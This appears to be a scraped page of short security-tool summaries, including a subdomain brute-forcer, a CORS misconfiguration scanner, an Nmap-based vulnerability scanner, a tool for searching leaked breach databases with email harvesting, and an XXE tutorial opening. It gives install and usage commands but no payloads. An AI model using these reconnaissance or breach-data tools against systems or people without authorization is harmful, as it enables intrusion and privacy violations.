image
Subdomain3 is a new generation of tool , It helps penetration testers to discover more information in a shorter time than other tools.The information includes subdomains, IP, CDN, and so on. Please enjoy it. Features More quick Three patterns for speed. User can modify the configuration(lib/config.py) file to speed-up. CDN support Determines whether the subdomain uses CDN storage automatically,even though the dict of CDN severs not contain the cname suffix. RFC CIDR Sorting ip and report CIDR(example 1.1.1.1/24) that it not use CDN storage; Multi-level subdomain support Discover more subdomains,example:admin.test.xx.com Big dict support Million of subs support Less resource consumption 1 CPU/1GB Memory/1Mbps bandwidth More intelligent Discover the fastest nameserver;The strategy of dynamically adjusting of dict by importing subdomains from other sources;Prevent dns cache pollution; Getting started git clone https://github.com/yanxiu0614/subdomain3.git pip install -r requirement.txt python2/3 brutedns.py -d tagetdomain -s high -l 5 Usage Short Form | Long Form | Description —|—|— -d | –domain | target domain,for example: baidu.com -s | –speed | speed,three patterns:fast,medium,low -l | –level | example: 2:w.baidu.com; 3:w.w.baidu.com; -f | –file | The list of target domain -c | –cname | n or y,collect cnames -ns | –default_dns | n or y -f1 | –sub_file | …

image
The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption. The pre-recorded data is categorized by platforms, adversary groups, tactics and techniques defined by the Mitre ATT&CK Framework . The pre-recorded data represents not only specific known malicious events but additional context/events that occur around it. This is done on purpose so that you can test creative correlations across diverse data sources, enhancing your detection strategy and potentially reducing the number of false positives in your own environment. The name Mordor comes from the awesome book/film series " The Lord of the Rings ", and it was a place where the evil forces of Sauron lived. This repository is where data generated by known "malicious" adversarial activity lives, hence the name of the project. Goals Provide free portable malicious datasets to expedite the development of data analytics. Facilitate adversarial techniques simulation and output consumption. Allow security analysts to test their skills with real known bad data. Improve the testing of hunting use cases and data analytics in an easier and more affordable way. Enable data scientists to have semi-labeled data for initial research. Map threat hunter playbooks to their respective pre-recorded data for validation purposes. Contribute to the ATT&CK framework Data Sources section of…

image
Attack Monitor is Python application written to enhance security monitoring capabilites of Windows 7/2008 (and all later versions) workstations/servers and to automate dynamic analysis of malware. Current modes (mutually exclusive): Endpoint detection (ED) Malware analysis (on dedicated Virtual Machine) Based on events from: Windows event logs Sysmon Watchdog (Filesystem monitoring Python library) TShark (only malware analysis mode) Current version 0.9.0 (Alpha) Contact [email protected] Demo Supported OS Windows 7, 8, 10 (x86 or x64) Windows 2008, 2012, 2016 (x86 or x64) Pre-requirements Powershell 5 Sysmon (Downloaded, configured and installed by installer.py) Python 3.6 (64-bit) – should work on Python 3.x Tshark (Malware analysis only) Various Python3 libraries (requirements.txt) StoneEngine library (included, first time published, high level windows event log interface – Alpha state) Supported system events Some of the events are only supported in Malware Analysis Mode Filesystem changes Permitted network connections PowerShell activity (detailed only with PowerShell 5) Process creation SMB activity Scheduled tasks Local accounts manipulations Success/Failed logins Drivers load Raw disk access Registry monitoring Pipe events Services Audit log cleared WMI monitoring of queries + WMI persistence DNS requests capture (via Tshark) Installation – Endpoint Detection Mode …

image
Your private data is being traded and sold all over the internet as we speak. Tons of leaks come out on a daily basis which can make you feel powerless. The majority of user-passwords and other sensitive information have been posted somewhere on the internet/darknet for any prying eyes to see, whether you like it or not. To take more control of what personal info is out there you can use Haveibeenpwned to narrow down which breaches your information has been exposed in. This is a great start but what if you want to know exactly what information of yours other people have access to? BaseQuery is an all in one program that makes importing and searching through thousands of data-breac hes easy. Features Included: A 4x nested storage structure Average import speeds of 12,000+ entries per second (Intel Core i7-7700HQ CPU @ 2.8GHz) Instantaneous querying system Facebook's zstd lossless compression algorithm to reduce the size of the data (On average reduces the data to less than 10% of the original size) Calculate the time all your files will take to import based on your specific hardware Duplicate data protection Output all of your findings in a standard format Email harvesting built-in Installing To Install BaseQuery type the following commands git clone https://github.com/g666gle/BaseQuery.git sudo chmod 755 -R BaseQuery/ cd BaseQuery ./dependencies.sh ./run.sh Getting Started Place any databases that you have into the "PutYourDataBasesHere"…

image
Graphs help to spot anomalies and patterns in large datasets. This script takes netstat information from multiple hosts and formats them in a way to make them importable into Neo4j. Neo4j can be queried for find connections to certain hosts, from certain hosts, find out the usage or protocols and much more. Example Files There are already some files in the example directory for you to be able to test the tool. you can also find example queries which will help you to have a basic idea of the possibilities of the search Status Currently the tool is tested with the netstat output of Windows systems using the command ‘netstat -an' Setup Install docker and docker-compose https://docs.docker.com/install/linux/docker-ce/centos/ https://docs.docker.com/compose/install/ Extract Files git clone https://github.com/trinitor/netstat2neo4j.git /opt/netstat2neo4j/ Start Container cd /opt/netstat2neo4j/docker docker-compose up -d Test Logon https://ip:7473 user: neo4j pass: neo4j Upload Netstat Files copy all netstat out files (*.txt files) into /opt/netstat2neo4j/script/import/ Create Cypher Statements for Neo4j cd /opt/netstat2neo4j/script/ bash csv2neo4j.sh the needed cypher statements can be found in create_database.txt Create Database browse to https://localhost:7473 Copy content from create_database.txt Paste into the command bar of the neo4j interface Example Query MATCH…

image
"Opening Pandora's Box through ATFuzzer: Dynamic Analysis of AT Interface for Android Smartphones" is accepted to the 35th Annual Computer Security Applications Conference (ACSAC) 2019. https://relentless-warrior.github.io/wp-content/uploads/2019/11/atfuzz.pdf Abstract This paper focuses on checking the correctness and robustness of the AT command interface exposed by the cellular baseband processor through Bluetooth and USB. A device’s application processor uses this interface for issuing high-level commands (or, AT commands) to the baseband processor for performing cellular network operations (e.g., placing a phone call). Vulnerabilities in this interface can be leveraged by malicious Bluetooth peripherals to launch various attacks including DoS and privacy attacks. To identify such vulnerabilities, we propose ATFuzzer that uses a grammar-guided evolutionary fuzzing approach which mutates production rules of the AT command grammar instead of concrete AT commands. Empirical evaluation with ATFuzzer on 8 Android smartphones from 5 vendors revealed 4 invalid AT command grammars over Bluetooth and 13 over USB with implications ranging from DoS, downgrade of cellular protocol version to severe privacy leaks. Run ATFuzzer Requirements Python 2.7.15. Please do not use python 3 because there are library incompatibilities. The required libraries are specified in the file _ requirements.txt _ and they can be installed executing the command: pip install -r…

image
In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks. What is XML external entity injection? XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access. In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks. There are various types of XXE attacks: XXE Attack Type | Description —|— Exploiting XXE to Retrieve Files | Where an external entity is defined containing the contents of a file, and returned in the application's response. Exploiting XXE to Perform SSRF Attacks | Where an external entity is defined based on a URL to a back-end system. Exploiting Blind XXE Exfiltrate Data Out-of-Band | Where sensitive data is transmitted from the application server to a system that the attacker controls. Exploiting blind XXE to Retrieve Data Via Error Messages | Where the attacker can trigger a parsing error message containing sensitive data. XML External…

image
We are incredibly excited to announce our fourth and final release of 2019, Kali Linux 2019.4. 2019.4 includes some exciting new updates: A new default desktop environment, Xfce New GTK3 theme (for Gnome and Xfce) Introduction of “Kali Undercover” mode Kali Documentation has a new home and is now Git powered Public Packaging – getting your tools into Kali Kali NetHunter KeX – Full Kali desktop on Android BTRFS during setup Added PowerShell The kernel is upgraded to version 5.3.9 … Plus the normal bugs fixes and updates. New Desktop Environment and GTK3 Theme There are a ton of updates to go over for this release, but the most in your face item that everyone is going to notice first are the changes to the desktop environment and theme. So let’s cover that first. An update to the desktop environment has been a long time coming: Performance issues – Gnome is a fully-featured desktop environment with a ton of awesome things it can do. But all these features comes with overhead, often overhead that is not useful for a distribution like Kali. We wanted to speed things up, and have a desktop environment that does only what it’s needed for, and nothing else. Gnome has been overkill for most Kali users, as many just want a window manager that allows you to run multiple terminal windows at once, and a web browser. Fractured user experience – We support a range of hardware, from the very high end to the very low. Because of this, traditionally our lower-end…

image
Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations. Usage Using Corsy is pretty simple python corsy.py -u https://example.com A delay between consecutive requests can be specified with -d option. _ Note: _ This is a beta version, features such as JSON output and scanning multiple hosts will be added later. Tests implemented Pre-domain bypass Post-domain bypass Backtick bypass Null origin bypass Unescaped dot bypass Invalid value Wild card value Origin reflection test Third party allowance test HTTP allowance test Support the developer Liked the project? Donate a few bucks to motivate me to keep writing code for free. Paypal – https://paypal.me/s0md3v Credit/Debit Card – https://www.buymeacoffee.com/s0md3v Download…

image
Flan Scan is a lightweight network vulnerability scanner. With Flan Scan you can easily find open ports on your network, identify services and their version, and get a list of relevant CVEs affecting your network. Flan Scan is a wrapper over Nmap and the vulners script which turns Nmap into a full-fledged network vulnerability scanner. Flan Scan makes it easy to deploy Nmap locally within a container, push results to the cloud, and deploy the scanner on Kubernetes. Getting Started Clone this repository Make sure you have docker setup: $ docker –version Add the list of IP addresses or CIDRS you wish to scan to shared/ips.txt . Build the container: $ make build Start scanning! $ make start When the scan finishes you will find a Latex report of the summarizing the scan in shared/reports . You can also see the raw XML output from Nmap in shared/xml_files . Custom Nmap Configuration By default Flan Scan runs the following Nmap command: $ nmap -sV -oX /shared/xml_files -oN – -v1 [email protected] –script=vulners/vulners.nse <ip-address> The -oX flag adds an XML version of the scan results to the /shared/xml_files directory and the -oN – flag outputs "normal" Nmap results to the console. The -v1 flag increases the verbosity to 1 and the -sV flag runs a service detection scan (aside from Nmap's default port and SYN scans). The –script=vulners/vulners.nse is the script that matches the services detected with relevant CVEs. Nmap…